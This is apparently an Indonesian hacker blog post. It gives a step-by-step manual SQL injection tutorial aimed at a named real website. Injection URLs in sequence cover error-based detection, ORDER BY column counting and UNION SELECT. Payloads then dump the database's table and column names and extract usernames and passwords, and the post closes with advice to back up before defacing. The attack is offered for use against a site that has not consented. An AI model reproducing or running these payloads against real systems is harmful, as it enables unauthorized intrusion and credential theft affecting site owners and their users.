SQL INJECTION MANUAL VIA ANDROID

Assalamualaikum warahmatullahi wabarakatuh :)
Ketemu lagi sama babang gans :* .. Kali ini gue mau share tutorial sql injection via andro, yuu simak di bawah :'

Hhm, Apa sih SQL Injection itu? sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan .. (kurang lebih seperti itu, heehe)

Oke, sekarang kita coba meginjeksi ke website target :)
http://www.pdpersi.co.id/content/pd_events.php?catid=13

Nah, untuk mengetahui web itu vuln atau tidak terhadap sql, kita coba kasih tanda ( ' ) setelah angka, seperti ini :
http://www.pdpersi.co.id/content/pd_events.php?catid=13'

Jika vuln akan menampilkan pesan kurang lebih seperti ini :
" You have an error in your SQL syntax; check the mnual that corresponds to your MySQL. server version for the right syntax to use near " order by id desc' at line 1 "

Oke, jika seperti itu kita lanjut menginjeksi dengan perintah order by sampai ketemu error yaa .. cek bawah :

http://www.pdpersi.co.id/content/pd_events.php?catid=13+order+by+1--+- (no error)
http://www.pdpersi.co.id/content/pd_events.php?catid=13+order+by+2--+- (no error)
http://www.pdpersi.co.id/content/pd_events.php?catid=13+order+by+3--+- (no error)
http://www.pdpersi.co.id/content/pd_events.php?catid=13+order+by+4--+- (no error)
http://www.pdpersi.co.id/content/pd_events.php?catid=13+order+by+5--+- (no error)
http://www.pdpersi.co.id/content/pd_events.php?catid=13+order+by+6--+- (error)

lebih jelasnya cek gambar dibawah :*


Nah errornya ketemu ka, sekarang ganti perintah +order+by dengan perintah +onion+select, jangan lupa kasih tanda ( - ) di depan angka ..

Kurang lebih seperti ini ka ;)
http://www.pdpersi.co.id/content/pd_events.php?catid=-13+union+select+1,2,3,4,5 .. dan terlihatkan Nomor Ajaibnya (bukan nomor togel ya :'v wkwk) lebih jelas cek gambar :*


Tuh kan :*
Oke kita oteweee ke tahap selanjutnya :*
Sekarang kita masukan exploit injectnya, kurang lebih seperti ini :
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Aku pilih nomor 2, jadinya seperti ini :
http://www.pdpersi.co.id/content/pd_events.php?catid=-13+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5

Cek gambar di bawah, tuh kan muncul table nya :*
Tinggal cari table yang ada username dan passwordnya :'v


Hmmmmmmnnnn :'3



Nah Jika Sudah Lihat,  Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject : /*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/ ,

JANGAN LUPA BACKUP SEBELUM NGINDEX :)
Happy INJECT :*
Nitiv nick gue dan team yaa, TN72 dan GARUDA TERSAKTI 72

oke makasih, sampai jumpa di lain hari :'v

Greets :
Indonesian Hackers Rulez